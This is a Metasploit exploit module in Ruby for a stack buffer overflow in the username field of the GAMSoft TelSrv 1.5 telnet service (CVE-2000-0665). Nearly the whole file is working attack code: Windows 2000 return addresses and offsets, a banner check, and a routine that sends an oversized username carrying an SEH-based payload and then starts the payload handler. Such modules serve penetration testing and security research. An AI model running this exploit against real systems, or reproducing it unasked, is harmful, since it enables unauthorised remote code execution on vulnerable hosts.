1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = AverageRanking
8
  include Msf::Exploit::Remote::Tcp
9
  include Msf::Exploit::Remote::Seh
10

11
  def initialize(info = {})
12
    super(
13
      update_info(
14
        info,
15
        'Name'	=> 'GAMSoft TelSrv 1.5 Username Buffer Overflow',
16
        'Description'	=> %q{
17
          This module exploits a username sprintf stack buffer overflow in GAMSoft TelSrv 1.5.
18
          Other versions may also be affected. The service terminates after exploitation,
19
          so you only get one chance!
20
        },
21
        'Author' => [ 'aushack' ],
22
        'Arch'	=> [ ARCH_X86 ],
23
        'License' => MSF_LICENSE,
24
        'References' => [
25
          [ 'CVE', '2000-0665'],
26
          [ 'OSVDB', '373'],
27
          [ 'BID', '1478'],
28
          [ 'URL', 'http://cdn.simtel.net/pub/simtelnet/win95/inetmisc/telsrv15.zip'],
29
        ],
30
        'Privileged'	=> false,
31
        'DefaultOptions' => {
32
          'EXITFUNC' => 'thread',
33
        },
34
        'Payload' => {
35
          'Space'	=> 1000,
36
          'BadChars' => "\x00\x0a",
37
          'StackAdjustment' => -3500,
38
        },
39
        'Platform' => ['win'],
40
        'Targets' => [
41
          [
42
            'Windows 2000 Pro SP0/4 English REMOTE',
43
            {
44
              'Ret'	=> 0x75022ac4, # pop/pop/ret ws2help.dll w2k pro en ALL
45
              'Offset'	=> 1886,
46
            }
47
          ],
48

49
          [
50
            'Windows 2000 Pro SP0/4 English LOCAL (debug - 127.0.0.1)',
51
            {
52
              'Ret' => 0x75022ac4, # pop/pop/ret ws2help.dll w2k pro en ALL
53
              'Offset'	=> 3318,
54
            }
55
          ],
56

57
          [
58
            'Windows 2000 Pro SP0/4 English LOCAL (debug - dhcp)',
59
            {
60
              'Ret' => 0x75022ac4, # pop/pop/ret ws2help.dll w2k pro en ALL
61
              'Offset' => 3358,
62
            }
63
          ],
64
=begin
65
          [ 'Windows XP Pro SP0/1 English',
66
            {
67
              'Ret' 		=> 0x71aa32ad, # pop/pop/ret xp pro en ALL
68
              'Offset'	=> 2600, # this is made up and absolutely wrong ;-)
69
            }
70
          ],
71
=end
72
        ],
73
        'DisclosureDate' => '2000-07-17',
74
        'DefaultTarget' => 0,
75
        'Notes' => {
76
          'Reliability' => UNKNOWN_RELIABILITY,
77
          'Stability' => UNKNOWN_STABILITY,
78
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
79
        }
80
      )
81
      )
82

83
    register_options(
84
      [
85
        Opt::RPORT(23),
86
      ]
87
    )
88
  end
89

90
  def check
91
    connect
92
    print_status("Attempting to determine if target is possibly vulnerable...")
93
    select(nil, nil, nil, 7)
94
    banner = sock.get_once || ''
95
    vprint_status("Banner: #{banner}")
96

97
    if banner.to_s =~ /TelSrv 1\.5/
98
      return Exploit::CheckCode::Appears
99
    end
100

101
    return Exploit::CheckCode::Safe
102
  end
103

104
  def exploit
105
    print_status("Trying target #{target.name} on host #{datastore['RHOST']}:#{datastore['RPORT']}...")
106
    connect
107
    print_status("Connected to telnet service... waiting several seconds.") # User friendly message due to sleep.
108
    select(nil, nil, nil, 7) # If unregistered version, you must wait for >5 seconds. Seven is safe. Six is not.
109

110
    username = rand_text_english(20000, payload_badchars)
111
    seh = generate_seh_payload(target.ret)
112
    username[target['Offset'], seh.length] = seh
113

114
    print_status("Sending #{username.length} byte username as exploit (including #{seh.length} byte payload)...")
115
    sock.put(username)
116
    select(nil, nil, nil, 0.25)
117
    print_status('Exploit sent...')
118
    handler
119
    disconnect
120
  end
121
end
122

123